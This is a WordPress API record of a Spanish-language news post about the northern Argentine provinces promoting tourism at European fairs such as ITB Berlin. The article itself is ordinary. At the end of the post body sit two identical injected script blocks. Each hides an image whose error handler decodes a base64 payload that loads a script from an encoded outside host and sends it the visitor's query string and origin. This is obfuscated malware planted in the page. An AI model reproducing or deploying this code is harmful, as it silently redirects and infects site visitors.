{"id":2302,"date":"2023-03-04T00:43:58","date_gmt":"2023-03-04T03:43:58","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2302"},"modified":"2025-08-14T00:22:03","modified_gmt":"2025-08-14T03:22:03","slug":"el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2302","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos-88258\">El Norte argentino apunta al crecimiento del turismo internacional en mercados europeos<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#c91945\"><em>En una visi\u00f3n conjunta de la regi\u00f3n junto al sector privado crece la presencia y comercializaci\u00f3n del Norte. Se realiz\u00f3 una reuni\u00f3n clave en Casa de Salta en Buenos Aires.<\/em><\/h4>\n\n\n\n<p>El Norte argentino en los \u00faltimos dos a\u00f1os increment\u00f3 de manera hist\u00f3rica la comercializaci\u00f3n en los mercados internacionales producto de una visi\u00f3n conjunta entre las provincias y una asociaci\u00f3n clave con el sector privado. En este marco hoy se reunieron en Casa de Salta en Buenos Aires, ministros y secretarios de turismo con m\u00e1s de 30 operadores asociados a la C\u00e1mara Argentina de Turismo que cuentan con paquetes que incluyen a Salta, Catamarca, Jujuy, Tucum\u00e1n, Santiago del Estero y La Rioja.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5990-el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos.jpg\" alt=\"\" width=\"261\" height=\"193\"\/><\/figure><\/div>\n\n\n<p>El encuentro sirvi\u00f3 para analizar la ejecuci\u00f3n de esta alianza, escuchar inquietudes de los operadores que luego ser\u00e1n transmitidas al sector privado de cada provincia y la firma de una adenda a un convenio de 2021 que posibilite la presencia de la regi\u00f3n en la Feria ITB en Berl\u00edn, Alemania. La misma se realizar\u00e1 entre el 7 y 9 de marzo.<\/p>\n\n\n\n<p>El convenio de 2021 firmado en el marco de la Feria Internacional de Turismo en Buenos Aires paut\u00f3 la presencia del Norte en ferias internacionales de Europa a trav\u00e9s de una inversi\u00f3n de las provincias pagando la inscripci\u00f3n a los operadores de la C\u00e1mara Argentina de Turismo que les posibilite vender en las mencionadas ferias la oferta regional.<\/p>\n\n\n\n<p>Horacio Rapucci, de la C\u00e1mara Argentina de Turismo (CAT) indic\u00f3 que \u201cfue una excelente reuni\u00f3n para analizar, realizar ajustes y perfeccionar la presencia en las pr\u00f3ximas ferias en base a un trabajo que hasta el momento ha arrojado muy buenos resultados. Esta acci\u00f3n conjunta tendr\u00e1 continuidad en ITB Berl\u00edn donde los tour operadores llevar\u00e1n las mejores propuestas para incrementar el arribo del turismo internacional a los destinos del norte argentino\u201d.<\/p>\n\n\n\n<p>Silvina G\u00f3mez, de Conextur, una de las operadoras mayoristas m\u00e1s grandes del pa\u00eds, se\u00f1al\u00f3 que \u201cel encuentro fue muy productivo para continuar trabajando juntos para ofrecer los destinos del Norte argentino en nuestros manuales\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5991-el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos.JPEG\" alt=\"\" width=\"264\" height=\"159\"\/><\/figure><\/div>\n\n\n<p>El ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, afirm\u00f3 que se \u201ctrata de planificar, con aquellos que tienen mucha experiencia en la comercializaci\u00f3n internacional, el crecimiento para nuestra regi\u00f3n sobre todo en el mercado europeo. Junto al sector privado trabajamos en el desarrollo de la regi\u00f3n con una visi\u00f3n unificada\u201d.<\/p>\n\n\n\n<p>\u201cEn la feria de FITUR (Madrid) antes de la pandemia eran 4 o 5 los operadores que vend\u00edan el Norte argentino, en la de este a\u00f1o, pas\u00f3 a 37, entonces en dos a\u00f1os el crecimiento de la comercializaci\u00f3n y la puesta en valor del norte argentino ha sido muy importante\u201d, enfatiz\u00f3 el funcionario salte\u00f1o.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5992-el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos-20230303195415.jpeg\" alt=\"\" width=\"264\" height=\"132\"\/><\/figure><\/div>\n\n\n<p>Tambi\u00e9n estuvieron presentes el delegado de Casa de Salta en Buenos Aires, Mart\u00edn Plaza, el presidente del Ente Aut\u00e1rquico Tucum\u00e1n Turismo, Sebasti\u00e1n Giobelina; el secretario de Turismo de Jujuy, Diego Valdecantos; el subsecretario de Turismo de Santiago del Estero, Nelson Bravo; el secretario de Turismo de La Rioja, Jos\u00e9 Rosa y la secretaria de Gesti\u00f3n Tur\u00edstica de Catamarca, Evangelina Quar\u00edn.<\/p>\n\n\n\n<p>El Norte argentino concentra 100.000 plazas hoteleras con excelente nivel de servicios, una gran competitividad en materia de tarifas, 200 vuelos diarios entre todas las provincias con productos culturales y gastron\u00f3micos \u00fanicos y de gran atractivo para el turista europeo. Por otra parte, los destinos trabajan en programas de sustentabilidad respondiendo a una demanda del mundo.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Norte argentino apunta al crecimiento del turismo internacional en mercados europeos\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/pHnWj2Yzh30?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-norte-argentino-apunta-al-crecimiento-del-turismo-internacional-en-mercados-europeos-88258\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En una visi\u00f3n conjunta de la regi\u00f3n junto al sector privado crece la presencia y comercializaci\u00f3n del Norte. Se realiz\u00f3 una reuni\u00f3n clave en Casa de Salta en Buenos Aires. El Norte argentino en los \u00faltimos dos a\u00f1os increment\u00f3 de manera hist\u00f3rica la comercializaci\u00f3n en los mercados internacionales producto de una visi\u00f3n conjunta entre las [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2303,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,18],"tags":[],"class_list":{"0":"post-2302","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2302"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2302"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2302\/revisions"}],"predecessor-version":[{"id":7158,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2302\/revisions\/7158"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2303"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}